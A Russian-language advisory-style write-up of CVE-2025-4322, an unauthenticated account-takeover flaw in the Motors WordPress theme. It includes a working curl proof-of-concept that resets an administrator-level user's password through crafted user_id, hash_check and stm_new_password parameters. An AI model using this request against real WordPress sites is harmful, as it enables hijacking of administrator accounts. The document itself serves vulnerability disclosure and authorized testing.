
CVE-2025-4322 – Неаутентифицированное повышение привилегий через обновление пароля «Захват учетной записи» 🔥
Тема Motors для WordPress уязвима для повышения привилегий через захват учётной записи во всех версиях до 5.6.67 включительно. Это связано с тем, что тема не проверяет должным образом личность пользователя перед обновлением его пароля. Это позволяет неаутентифицированным злоумышленникам изменять произвольные пароли пользователей, в том числе администраторов, и получать доступ к их учётным записям.
CNA: Wordfence Базовая оценка: 9.8 ⚫ КРИТИЧЕСКИЙ Вектор: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
5.6.67 - Неаутентифицированное повышение привилегий через обновление пароля/захват учётной записи5.6.67Тема Motors для WordPress (до версии 5.6.67 включительно) содержит критическую ошибку аутентификации в функционале сброса пароля.
Она предоставляет механизм обновления пароля на стороне клиента через конечные точки, но не проверяет должным образом личность или авторизацию пользователя перед обработкой изменений пароля.
В результате неаутентифицированные злоумышленники могут отправлять специально сформированные HTTP-запросы, содержащие user_id, произвольный hash_check и новый пароль (stm_new_password), чтобы сбросить пароль любого пользователя — включая администраторов.
Если эксплуатировать, это позволяет злоумышленникам:
curl "https://local.ization/loginregister/?user_id=2&hash_check=%C0" --data "stm_new_password=randomizer" -XPOST -v -H 'User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Mobile Safari/537.36'
Этот отчёт предназначен только для образовательных и авторизованных целей тестирования безопасности. Эксплуатация данной уязвимости без разрешения может нарушить правовые и этические границы.